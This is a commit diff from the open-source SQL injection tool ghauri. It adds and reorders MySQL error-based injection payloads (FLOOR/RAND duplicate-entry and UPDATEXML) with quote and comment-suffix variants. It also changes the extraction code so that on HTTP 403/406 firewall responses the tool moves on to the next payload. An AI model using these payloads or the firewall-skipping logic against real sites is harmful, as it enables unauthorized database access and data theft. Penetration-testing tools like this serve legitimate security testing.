Projects STRLCPY ghauri Commits 8afc6b3f
🤬
  • added multiple fixed to multiple types of injections..

  • Loading...
  • r0oth3x49 committed 1 year ago
    8afc6b3f
    1 parent b62726e4
  • ■ ■ ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 76 lines
    77 77  # r"(?isx)(Duplicate\s*entry\s*\'(?:~)(?:\()?(?P<error_based_response>.*?))1\'"
    78 78  # )
    79 79  REGEX_ERROR_BASED = (
    80  - r"(?is)(?:Duplicate\s*entry\s*(['\"])(?P<error_based_response>(.*?))(?:~)?1\1)"
     80 + # r"(?is)(?:Duplicate\s*entry\s*(['\"])(?P<error_based_response>(.*?))(?:~)?1\1)"
     81 + r"(?is)(?:Duplicate\s*entry\s*(['\"])(?P<error_based_response>(.*?))(?:~1)?\1)"
    81 82  )
    82 83  REGEX_BIGINT_BASED = (
    83 84   r"(?isx)(BIGINT.*\s.*Injected~(?:\()?(?P<error_based_response>.*?))\~END"
    skipped 681 lines
    765 766   "dbms": "MySQL",
    766 767   },
    767 768   {
     769 + "payload": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
     770 + "comments": [
     771 + # {"pref": " ", "suf": ""},
     772 + {"pref": " ", "suf": "-- wXyW"},
     773 + {"pref": " ", "suf": "#"},
     774 + # {"pref": "' ", "suf": ""},
     775 + {"pref": "' ", "suf": "-- wXyW"},
     776 + {"pref": "' ", "suf": "#"},
     777 + # {"pref": '" ', "suf": ""},
     778 + {"pref": '" ', "suf": "-- wXyW"},
     779 + {"pref": '" ', "suf": "#"},
     780 + # {"pref": ") ", "suf": ""},
     781 + {"pref": ") ", "suf": "-- wXyW"},
     782 + {"pref": ") ", "suf": "#"},
     783 + # {"pref": "') ", "suf": ""},
     784 + {"pref": "') ", "suf": "-- wXyW"},
     785 + {"pref": "') ", "suf": "#"},
     786 + # {"pref": '") ', "suf": ""},
     787 + {"pref": '") ', "suf": "-- wXyW"},
     788 + {"pref": '") ', "suf": "#"},
     789 + ],
     790 + "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
     791 + "vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
     792 + "dbms": "MySQL",
     793 + },
     794 + {
     795 + "payload": "OR 1 GROUP BY CONCAT_WS(0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))HAVING(MIN(0))",
     796 + "comments": [
     797 + # {"pref": " ", "suf": ""},
     798 + {"pref": " ", "suf": "-- wXyW"},
     799 + {"pref": " ", "suf": "#"},
     800 + # {"pref": "' ", "suf": ""},
     801 + {"pref": "' ", "suf": "-- wXyW"},
     802 + {"pref": "' ", "suf": "#"},
     803 + # {"pref": '" ', "suf": ""},
     804 + {"pref": '" ', "suf": "-- wXyW"},
     805 + {"pref": '" ', "suf": "#"},
     806 + # {"pref": ") ", "suf": ""},
     807 + {"pref": ") ", "suf": "-- wXyW"},
     808 + {"pref": ") ", "suf": "#"},
     809 + # {"pref": "') ", "suf": ""},
     810 + {"pref": "') ", "suf": "-- wXyW"},
     811 + {"pref": "') ", "suf": "#"},
     812 + # {"pref": '") ', "suf": ""},
     813 + {"pref": '") ', "suf": "-- wXyW"},
     814 + {"pref": '") ', "suf": "#"},
     815 + ],
     816 + "title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)",
     817 + "vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))",
     818 + "dbms": "MySQL",
     819 + },
     820 + {
    768 821   "payload": "UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)",
    769 822   "comments": [
    770 823   {"pref": "", "suf": ""},
    skipped 123 lines
    894 947   ],
    895 948   "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)",
    896 949   "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
    897  - "dbms": "MySQL",
    898  - },
    899  - {
    900  - "payload": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
    901  - "comments": [
    902  - # {"pref": " ", "suf": ""},
    903  - {"pref": " ", "suf": "-- wXyW"},
    904  - {"pref": " ", "suf": "#"},
    905  - # {"pref": "' ", "suf": ""},
    906  - {"pref": "' ", "suf": "-- wXyW"},
    907  - {"pref": "' ", "suf": "#"},
    908  - # {"pref": '" ', "suf": ""},
    909  - {"pref": '" ', "suf": "-- wXyW"},
    910  - {"pref": '" ', "suf": "#"},
    911  - # {"pref": ") ", "suf": ""},
    912  - {"pref": ") ", "suf": "-- wXyW"},
    913  - {"pref": ") ", "suf": "#"},
    914  - # {"pref": "') ", "suf": ""},
    915  - {"pref": "') ", "suf": "-- wXyW"},
    916  - {"pref": "') ", "suf": "#"},
    917  - # {"pref": '") ', "suf": ""},
    918  - {"pref": '") ', "suf": "-- wXyW"},
    919  - {"pref": '") ', "suf": "#"},
    920  - ],
    921  - "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
    922  - "vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
    923  - "dbms": "MySQL",
    924  - },
    925  - {
    926  - "payload": "OR 1 GROUP BY CONCAT_WS(0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))HAVING(MIN(0))",
    927  - "comments": [
    928  - # {"pref": " ", "suf": ""},
    929  - {"pref": " ", "suf": "-- wXyW"},
    930  - {"pref": " ", "suf": "#"},
    931  - # {"pref": "' ", "suf": ""},
    932  - {"pref": "' ", "suf": "-- wXyW"},
    933  - {"pref": "' ", "suf": "#"},
    934  - # {"pref": '" ', "suf": ""},
    935  - {"pref": '" ', "suf": "-- wXyW"},
    936  - {"pref": '" ', "suf": "#"},
    937  - # {"pref": ") ", "suf": ""},
    938  - {"pref": ") ", "suf": "-- wXyW"},
    939  - {"pref": ") ", "suf": "#"},
    940  - # {"pref": "') ", "suf": ""},
    941  - {"pref": "') ", "suf": "-- wXyW"},
    942  - {"pref": "') ", "suf": "#"},
    943  - # {"pref": '") ', "suf": ""},
    944  - {"pref": '") ', "suf": "-- wXyW"},
    945  - {"pref": '") ', "suf": "#"},
    946  - ],
    947  - "title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)",
    948  - "vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))",
    949 950   "dbms": "MySQL",
    950 951   },
    951 952   {
    skipped 1112 lines
  • ■ ■ ■ ■ ■
    ghauri/common/utils.py
    skipped 634 lines
    635 635   _cases.append("Status Code")
    636 636   if _cases:
    637 637   case = ", ".join(_cases)
    638  - logger.debug(f"possible injectable cases detected: '{case}'")
     638 + if 403 in [scb, sct, scf]:
     639 + case = ""
     640 + is_vulner = False
     641 + else:
     642 + logger.debug(f"possible injectable cases detected: '{case}'")
    639 643   if case == "Page Ratio":
    640 644   w0set = set(get_filtered_page_content(base.text, True, "\n").split("\n"))
    641 645   w1set = set(get_filtered_page_content(attack_true.text, True, "\n").split("\n"))
    skipped 1385 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/core/extract.py
    skipped 140 lines
    141 141   expression = entry.get("expression")
    142 142   _type = entry.get("type")
    143 143   logger.payload(f"{expression}")
    144  - if http_firewall_code_counter > 2:
    145  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    146  - logger.warning(f"HTTP error code detected during run:")
    147  - choice = logger.read_input(
    148  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    149  - batch=False,
    150  - user_input="C",
    151  - )
    152  - if choice == "q":
    153  - logger.error("user quit")
    154  - logger.end("ending")
    155  - exit(0)
    156  - if choice == "c":
    157  - http_firewall_code_counter = 0
    158  - if retry_on_error >= retry:
    159  - logger.warning(f"Ghauri detected connection errors multiple times")
    160  - choice = logger.read_input(
    161  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    162  - batch=False,
    163  - user_input="C",
    164  - )
    165  - if choice == "q":
    166  - logger.error("user quit")
    167  - logger.end("ending")
    168  - exit(0)
    169  - if choice == "c":
    170  - retry_on_error = 0
     144 + # if http_firewall_code_counter > 2:
     145 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     146 + # logger.warning(f"HTTP error code detected during run:")
     147 + # choice = logger.read_input(
     148 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     149 + # batch=False,
     150 + # user_input="C",
     151 + # )
     152 + # if choice == "q":
     153 + # logger.error("user quit")
     154 + # logger.end("ending")
     155 + # exit(0)
     156 + # if choice == "c":
     157 + # http_firewall_code_counter = 0
     158 + # if retry_on_error >= retry:
     159 + # logger.warning(f"Ghauri detected connection errors multiple times")
     160 + # choice = logger.read_input(
     161 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     162 + # batch=False,
     163 + # user_input="C",
     164 + # )
     165 + # if choice == "q":
     166 + # logger.error("user quit")
     167 + # logger.end("ending")
     168 + # exit(0)
     169 + # if choice == "c":
     170 + # retry_on_error = 0
    171 171   if delay > 0:
    172 172   time.sleep(delay)
    173 173   try:
    skipped 10 lines
    184 184   is_multipart=is_multipart,
    185 185   injection_type=injection_type,
    186 186   )
    187  - if attack.status_code in [403, 406]:
    188  - logger.critical(
    189  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    190  - )
    191  - time.sleep(0.5)
    192  - error_msg = attack.error_msg
    193  - http_firewall_code_counter += 1
    194  - continue
     187 + # if attack.status_code in [403, 406]:
     188 + # logger.critical(
     189 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     190 + # )
     191 + # time.sleep(0.5)
     192 + # error_msg = attack.error_msg
     193 + # http_firewall_code_counter += 1
     194 + # continue
    195 195   logger.debug(
    196 196   f"sleep time: {timesec}, response time: {attack.response_time}"
    197 197   )
    skipped 135 lines
    333 333   error_msg = None
    334 334   if identified_character:
    335 335   for i in range(1, retry + 1):
    336  - if http_firewall_code_counter > 2:
    337  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    338  - logger.warning(f"HTTP error code detected during run:")
    339  - choice = logger.read_input(
    340  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    341  - batch=False,
    342  - user_input="C",
    343  - )
    344  - if choice == "q":
    345  - logger.error("user quit")
    346  - logger.end("ending")
    347  - exit(0)
    348  - if choice == "c":
    349  - http_firewall_code_counter = 0
    350  - if retry_on_error >= retry:
    351  - logger.warning(f"Ghauri detected connection errors multiple times")
    352  - choice = logger.read_input(
    353  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    354  - batch=False,
    355  - user_input="C",
    356  - )
    357  - if choice == "q":
    358  - logger.error("user quit")
    359  - logger.end("ending")
    360  - exit(0)
    361  - if choice == "c":
    362  - retry_on_error = 0
     336 + # if http_firewall_code_counter > 2:
     337 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     338 + # logger.warning(f"HTTP error code detected during run:")
     339 + # choice = logger.read_input(
     340 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     341 + # batch=False,
     342 + # user_input="C",
     343 + # )
     344 + # if choice == "q":
     345 + # logger.error("user quit")
     346 + # logger.end("ending")
     347 + # exit(0)
     348 + # if choice == "c":
     349 + # http_firewall_code_counter = 0
     350 + # if retry_on_error >= retry:
     351 + # logger.warning(f"Ghauri detected connection errors multiple times")
     352 + # choice = logger.read_input(
     353 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     354 + # batch=False,
     355 + # user_input="C",
     356 + # )
     357 + # if choice == "q":
     358 + # logger.error("user quit")
     359 + # logger.end("ending")
     360 + # exit(0)
     361 + # if choice == "c":
     362 + # retry_on_error = 0
    363 363   if delay > 0:
    364 364   time.sleep(delay)
    365 365   condition = expression_payload.format(
    skipped 24 lines
    390 390   is_multipart=is_multipart,
    391 391   injection_type=injection_type,
    392 392   )
    393  - if attack.status_code in [403, 406]:
    394  - logger.critical(
    395  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    396  - )
    397  - time.sleep(0.5)
    398  - error_msg = attack.error_msg
    399  - http_firewall_code_counter += 1
    400  - continue
     393 + # if attack.status_code in [403, 406]:
     394 + # logger.critical(
     395 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     396 + # )
     397 + # time.sleep(0.5)
     398 + # error_msg = attack.error_msg
     399 + # http_firewall_code_counter += 1
     400 + # continue
    401 401   logger.debug(
    402 402   f"sleep time: {sleep_time}, response time: {attack.response_time}"
    403 403   )
    skipped 124 lines
    528 528   )
    529 529   index = 0
    530 530   while index < len(sorted_ascii_list):
    531  - if http_firewall_code_counter > 2:
    532  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    533  - logger.warning(f"HTTP error code detected during run:")
    534  - choice = logger.read_input(
    535  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    536  - batch=False,
    537  - user_input="C",
    538  - )
    539  - if choice == "q":
    540  - logger.error("user quit")
    541  - logger.end("ending")
    542  - exit(0)
    543  - if choice == "c":
    544  - http_firewall_code_counter = 0
    545  - if retry_on_error >= retry:
    546  - logger.warning(f"Ghauri detected connection errors multiple times")
    547  - choice = logger.read_input(
    548  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    549  - batch=False,
    550  - user_input="C",
    551  - )
    552  - if choice == "q":
    553  - logger.error("user quit")
    554  - logger.end("ending")
    555  - exit(0)
    556  - if choice == "c":
    557  - retry_on_error = 0
     531 + # if http_firewall_code_counter > 2:
     532 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     533 + # logger.warning(f"HTTP error code detected during run:")
     534 + # choice = logger.read_input(
     535 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     536 + # batch=False,
     537 + # user_input="C",
     538 + # )
     539 + # if choice == "q":
     540 + # logger.error("user quit")
     541 + # logger.end("ending")
     542 + # exit(0)
     543 + # if choice == "c":
     544 + # http_firewall_code_counter = 0
     545 + # if retry_on_error >= retry:
     546 + # logger.warning(f"Ghauri detected connection errors multiple times")
     547 + # choice = logger.read_input(
     548 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     549 + # batch=False,
     550 + # user_input="C",
     551 + # )
     552 + # if choice == "q":
     553 + # logger.error("user quit")
     554 + # logger.end("ending")
     555 + # exit(0)
     556 + # if choice == "c":
     557 + # retry_on_error = 0
    558 558   if delay > 0:
    559 559   time.sleep(delay)
    560 560   characters_list = sorted_ascii_list[index]
    skipped 22 lines
    583 583   is_multipart=is_multipart,
    584 584   injection_type=injection_type,
    585 585   )
    586  - if attack.status_code in [403, 406]:
    587  - logger.critical(
    588  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    589  - )
    590  - time.sleep(0.5)
    591  - error_msg = attack.error_msg
    592  - http_firewall_code_counter += 1
    593  - continue
     586 + # if attack.status_code in [403, 406]:
     587 + # logger.critical(
     588 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     589 + # )
     590 + # time.sleep(0.5)
     591 + # error_msg = attack.error_msg
     592 + # http_firewall_code_counter += 1
     593 + # continue
    594 594   response_time = attack.response_time
    595 595   logger.debug(
    596 596   f"sleep time: {sleep_time}, response time: {response_time}"
    skipped 136 lines
    733 733   logger.progress(f"retrieved: {chars}")
    734 734   sleep_time = timesec if conf.timesec <= timesec else conf.timesec
    735 735   while not is_found:
    736  - if http_firewall_code_counter > 2:
    737  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    738  - logger.warning(f"HTTP error code detected during run:")
    739  - choice = logger.read_input(
    740  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    741  - batch=False,
    742  - user_input="C",
    743  - )
    744  - if choice == "q":
    745  - logger.error("user quit")
    746  - logger.end("ending")
    747  - exit(0)
    748  - if choice == "c":
    749  - http_firewall_code_counter = 0
    750  - if retry_on_error >= retry:
    751  - logger.warning(f"Ghauri detected connection errors multiple times")
    752  - choice = logger.read_input(
    753  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    754  - batch=False,
    755  - user_input="C",
    756  - )
    757  - if choice == "q":
    758  - logger.error("user quit")
    759  - logger.end("ending")
    760  - exit(0)
    761  - if choice == "c":
    762  - retry_on_error = 0
     736 + # if http_firewall_code_counter > 2:
     737 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     738 + # logger.warning(f"HTTP error code detected during run:")
     739 + # choice = logger.read_input(
     740 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     741 + # batch=False,
     742 + # user_input="C",
     743 + # )
     744 + # if choice == "q":
     745 + # logger.error("user quit")
     746 + # logger.end("ending")
     747 + # exit(0)
     748 + # if choice == "c":
     749 + # http_firewall_code_counter = 0
     750 + # if retry_on_error >= retry:
     751 + # logger.warning(f"Ghauri detected connection errors multiple times")
     752 + # choice = logger.read_input(
     753 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     754 + # batch=False,
     755 + # user_input="C",
     756 + # )
     757 + # if choice == "q":
     758 + # logger.error("user quit")
     759 + # logger.end("ending")
     760 + # exit(0)
     761 + # if choice == "c":
     762 + # retry_on_error = 0
    763 763   if conf._readtimout_counter >= 3:
    764 764   logger.warning(
    765 765   f"Ghauri detected readtimout '{conf._readtimout_counter}' time(s), increasing --timeout to 120 seconds, default was 30 seconds.."
    skipped 42 lines
    808 808   is_multipart=is_multipart,
    809 809   injection_type=injection_type,
    810 810   )
    811  - if attack.status_code in [403, 406]:
    812  - logger.critical(
    813  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    814  - )
    815  - time.sleep(0.5)
    816  - error_msg = attack.error_msg
    817  - http_firewall_code_counter += 1
    818  - ascii_char = ascii_char
    819  - minimum = minimum
    820  - maximum = maximum
    821  - continue
     811 + # if attack.status_code in [403, 406]:
     812 + # logger.critical(
     813 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     814 + # )
     815 + # time.sleep(0.5)
     816 + # error_msg = attack.error_msg
     817 + # http_firewall_code_counter += 1
     818 + # ascii_char = ascii_char
     819 + # minimum = minimum
     820 + # maximum = maximum
     821 + # continue
    822 822   response_time = attack.response_time
    823 823   logger.debug(
    824 824   f"sleep time: {sleep_time}, response time: {response_time}"
    skipped 97 lines
    922 922   retry_on_error = 0
    923 923   sleep_time = timesec if conf.timesec <= timesec else conf.timesec
    924 924   while start < end:
    925  - if http_firewall_code_counter > 2:
    926  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    927  - logger.warning(f"HTTP error code detected during run:")
    928  - choice = logger.read_input(
    929  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    930  - batch=False,
    931  - user_input="C",
    932  - )
    933  - if choice == "q":
    934  - logger.error("user quit")
    935  - logger.end("ending")
    936  - exit(0)
    937  - if choice == "c":
    938  - http_firewall_code_counter = 0
    939  - if retry_on_error >= retry:
    940  - logger.warning(f"Ghauri detected connection errors multiple times")
    941  - choice = logger.read_input(
    942  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    943  - batch=False,
    944  - user_input="C",
    945  - )
    946  - if choice == "q":
    947  - logger.error("user quit")
    948  - logger.end("ending")
    949  - exit(0)
    950  - if choice == "c":
    951  - retry_on_error = 0
     925 + # if http_firewall_code_counter > 2:
     926 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     927 + # logger.warning(f"HTTP error code detected during run:")
     928 + # choice = logger.read_input(
     929 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     930 + # batch=False,
     931 + # user_input="C",
     932 + # )
     933 + # if choice == "q":
     934 + # logger.error("user quit")
     935 + # logger.end("ending")
     936 + # exit(0)
     937 + # if choice == "c":
     938 + # http_firewall_code_counter = 0
     939 + # if retry_on_error >= retry:
     940 + # logger.warning(f"Ghauri detected connection errors multiple times")
     941 + # choice = logger.read_input(
     942 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     943 + # batch=False,
     944 + # user_input="C",
     945 + # )
     946 + # if choice == "q":
     947 + # logger.error("user quit")
     948 + # logger.end("ending")
     949 + # exit(0)
     950 + # if choice == "c":
     951 + # retry_on_error = 0
    952 952   ascii_char = list_of_chars[start]
    953 953   if delay > 0:
    954 954   time.sleep(delay)
    skipped 19 lines
    974 974   is_multipart=is_multipart,
    975 975   injection_type=injection_type,
    976 976   )
    977  - if attack.status_code in [403, 406]:
    978  - logger.critical(
    979  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    980  - )
    981  - time.sleep(0.5)
    982  - error_msg = attack.error_msg
    983  - http_firewall_code_counter += 1
    984  - continue
     977 + # if attack.status_code in [403, 406]:
     978 + # logger.critical(
     979 + # f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     980 + # )
     981 + # time.sleep(0.5)
     982 + # error_msg = attack.error_msg
     983 + # http_firewall_code_counter += 1
     984 + # continue
    985 985   start += 1
    986 986   if attack01 and vector_type == "boolean_vector":
    987 987   bool_retval = check_boolean_responses(
    skipped 86 lines
    1074 1074   is_noc_payload_found = False
    1075 1075   for entry in payloads:
    1076 1076   is_noc_found = False
    1077  - for i in range(1, 10):
     1077 + start_pos = 1
     1078 + stop = 10
     1079 + while start_pos < stop:
    1078 1080   if delay > 0:
    1079 1081   time.sleep(delay)
    1080 1082   sleep_time = timesec if conf.timesec <= timesec else conf.timesec
    1081  - condition = value.format(query=entry, char=i)
     1083 + condition = value.format(query=entry, char=start_pos)
    1082 1084   expression = vector.replace("[INFERENCE]", f"{condition}").replace(
    1083 1085   "[SLEEPTIME]", f"{sleep_time}"
    1084 1086   )
    skipped 18 lines
    1103 1105   )
    1104 1106   logger.end("ending")
    1105 1107   exit(0)
     1108 + if attack.status_code in [403, 406]:
     1109 + # move towards next payload in a list as current payload is restricted by firewall
     1110 + logger.debug(
     1111 + "moving towards next payload in a list as current payload is restricted by firewall."
     1112 + )
     1113 + break
    1106 1114   if attack01 and vector_type == "boolean_vector":
    1107 1115   bool_retval = check_boolean_responses(
    1108 1116   base,
    skipped 8 lines
    1117 1125   if result:
    1118 1126   working_query = entry
    1119 1127   logger.debug(
    1120  - f"retrieved number of characters in length query {i}"
     1128 + f"retrieved number of characters in length query {start_pos}"
    1121 1129   )
    1122  - noc = i
     1130 + noc = start_pos
    1123 1131   is_noc_found = True
    1124 1132   break
    1125 1133   if vector_type == "time_vector":
    skipped 4 lines
    1130 1138   if response_time >= sleep_time:
    1131 1139   working_query = entry
    1132 1140   logger.debug(
    1133  - f"retrieved number of characters in length query {i}"
     1141 + f"retrieved number of characters in length query {start_pos}"
    1134 1142   )
    1135  - noc = i
     1143 + noc = start_pos
    1136 1144   is_noc_found = True
    1137 1145   break
     1146 + start_pos += 1
    1138 1147   if is_noc_found:
    1139 1148   is_noc_payload_found = True
    1140 1149   break
    skipped 52 lines
    1193 1202   )
    1194 1203   if query_check and noc > 0:
    1195 1204   return _
     1205 + if noc < 1:
     1206 + logger.debug(
     1207 + "Ghauri couldn't determine the number if character(s) in length query"
     1208 + )
    1196 1209   length = 0
    1197  - if not suppress_output:
    1198  - logger.info(f"retrieving the length of query output")
    1199  - length_extraction_payloads = LENGTH_PAYLOADS.get(backend)
    1200  - if isinstance(length_extraction_payloads, str):
    1201  - length_extraction_payloads = [length_extraction_payloads]
    1202  - attack_url = url
    1203  - attack_data = data
    1204  - attack_headers = headers
    1205  - for value in length_extraction_payloads:
    1206  - is_length_found = False
    1207  - for entry in payloads:
    1208  - chars = ""
    1209  - pos = 1
    1210  - total_number_of_characters = noc + 1
    1211  - while pos < total_number_of_characters:
    1212  - if attack01 and vector_type == "boolean_vector":
    1213  - try:
    1214  - retval = self._binary_search(
    1215  - url=url,
    1216  - data=data,
    1217  - vector=vector,
    1218  - parameter=parameter,
    1219  - headers=headers,
    1220  - base=base,
    1221  - injection_type=injection_type,
    1222  - delay=delay,
    1223  - timesec=timesec,
    1224  - timeout=timeout,
    1225  - proxy=proxy,
    1226  - attack01=attack01,
    1227  - code=code,
    1228  - match_string=match_string,
    1229  - not_match_string=not_match_string,
    1230  - is_multipart=is_multipart,
    1231  - suppress_output=suppress_output,
    1232  - query_check=query_check,
    1233  - minimum=48,
    1234  - maximum=58,
    1235  - offset=pos,
    1236  - expression_payload=value,
    1237  - queryable=entry,
    1238  - chars=chars,
    1239  - text_only=text_only,
    1240  - vector_type=vector_type,
    1241  - )
    1242  - if retval:
    1243  - is_valid = self.validate_character(
     1210 + if noc > 1:
     1211 + if not suppress_output:
     1212 + logger.info(f"retrieving the length of query output")
     1213 + length_extraction_payloads = LENGTH_PAYLOADS.get(backend)
     1214 + if isinstance(length_extraction_payloads, str):
     1215 + length_extraction_payloads = [length_extraction_payloads]
     1216 + attack_url = url
     1217 + attack_data = data
     1218 + attack_headers = headers
     1219 + for value in length_extraction_payloads:
     1220 + is_length_found = False
     1221 + for entry in payloads:
     1222 + chars = ""
     1223 + pos = 1
     1224 + total_number_of_characters = noc + 1
     1225 + while pos < total_number_of_characters:
     1226 + if attack01 and vector_type == "boolean_vector":
     1227 + try:
     1228 + retval = self._binary_search(
    1244 1229   url=url,
    1245 1230   data=data,
    1246 1231   vector=vector,
    skipped 1 lines
    1248 1233   headers=headers,
    1249 1234   base=base,
    1250 1235   injection_type=injection_type,
     1236 + delay=delay,
     1237 + timesec=timesec,
     1238 + timeout=timeout,
     1239 + proxy=proxy,
     1240 + attack01=attack01,
     1241 + code=code,
     1242 + match_string=match_string,
     1243 + not_match_string=not_match_string,
     1244 + is_multipart=is_multipart,
     1245 + suppress_output=suppress_output,
     1246 + query_check=query_check,
     1247 + minimum=48,
     1248 + maximum=58,
     1249 + offset=pos,
     1250 + expression_payload=value,
     1251 + queryable=entry,
     1252 + chars=chars,
     1253 + text_only=text_only,
     1254 + vector_type=vector_type,
     1255 + )
     1256 + if retval:
     1257 + is_valid = self.validate_character(
     1258 + url=url,
     1259 + data=data,
     1260 + vector=vector,
     1261 + parameter=parameter,
     1262 + headers=headers,
     1263 + base=base,
     1264 + injection_type=injection_type,
     1265 + proxy=proxy,
     1266 + is_multipart=is_multipart,
     1267 + timeout=timeout,
     1268 + delay=delay,
     1269 + timesec=timesec,
     1270 + identified_character=retval,
     1271 + vector_type=vector_type,
     1272 + offset=pos,
     1273 + expression_payload=value,
     1274 + queryable=entry,
     1275 + code=code,
     1276 + match_string=match_string,
     1277 + not_match_string=not_match_string,
     1278 + attack01=attack01,
     1279 + )
     1280 + if not is_valid:
     1281 + logger.warning(
     1282 + "invalid character detected, retrying."
     1283 + )
     1284 + break
     1285 + if is_valid:
     1286 + pos += 1
     1287 + chars += retval
     1288 + logger.debug(f"character found: {chars}")
     1289 + except KeyboardInterrupt:
     1290 + is_length_found = True
     1291 + length = 0
     1292 + break
     1293 + if vector_type == "time_vector":
     1294 + try:
     1295 + retval = self._linear_search(
     1296 + url=url,
     1297 + data=data,
     1298 + vector=vector,
     1299 + parameter=parameter,
     1300 + headers=headers,
     1301 + injection_type=injection_type,
    1251 1302   proxy=proxy,
    1252 1303   is_multipart=is_multipart,
    1253 1304   timeout=timeout,
    1254 1305   delay=delay,
    1255 1306   timesec=timesec,
    1256  - identified_character=retval,
    1257  - vector_type=vector_type,
    1258  - offset=pos,
     1307 + suppress_output=suppress_output,
    1259 1308   expression_payload=value,
    1260 1309   queryable=entry,
    1261  - code=code,
    1262  - match_string=match_string,
    1263  - not_match_string=not_match_string,
    1264  - attack01=attack01,
     1310 + chars=chars,
     1311 + offset=pos,
     1312 + list_of_chars="2013456789",
     1313 + vector_type=vector_type,
    1265 1314   )
    1266  - if not is_valid:
    1267  - logger.warning(
    1268  - "invalid character detected, retrying."
    1269  - )
    1270  - break
    1271  - if is_valid:
    1272 1315   pos += 1
    1273 1316   chars += retval
    1274  - logger.debug(f"character found: {chars}")
    1275  - except KeyboardInterrupt:
    1276  - is_length_found = True
    1277  - length = 0
    1278  - break
    1279  - if vector_type == "time_vector":
    1280  - try:
    1281  - retval = self._linear_search(
    1282  - url=url,
    1283  - data=data,
    1284  - vector=vector,
    1285  - parameter=parameter,
    1286  - headers=headers,
    1287  - injection_type=injection_type,
    1288  - proxy=proxy,
    1289  - is_multipart=is_multipart,
    1290  - timeout=timeout,
    1291  - delay=delay,
    1292  - timesec=timesec,
    1293  - suppress_output=suppress_output,
    1294  - expression_payload=value,
    1295  - queryable=entry,
    1296  - chars=chars,
    1297  - offset=pos,
    1298  - list_of_chars="2013456789",
    1299  - vector_type=vector_type,
    1300  - )
    1301  - pos += 1
    1302  - chars += retval
    1303  - logger.debug(f"character found: '{str(chars)}'")
    1304  - except KeyboardInterrupt:
    1305  - is_length_found = True
    1306  - length = 0
    1307  - break
    1308  - if len(chars) == noc:
    1309  - if not suppress_output:
    1310  - logger.info(f"retrieved: {chars}")
    1311  - length = int(chars) if chars.isdigit() else 0
    1312  - is_length_found = True
     1317 + logger.debug(f"character found: '{str(chars)}'")
     1318 + except KeyboardInterrupt:
     1319 + is_length_found = True
     1320 + length = 0
     1321 + break
     1322 + if len(chars) == noc:
     1323 + if not suppress_output:
     1324 + logger.info(f"retrieved: {chars}")
     1325 + length = int(chars) if chars.isdigit() else 0
     1326 + is_length_found = True
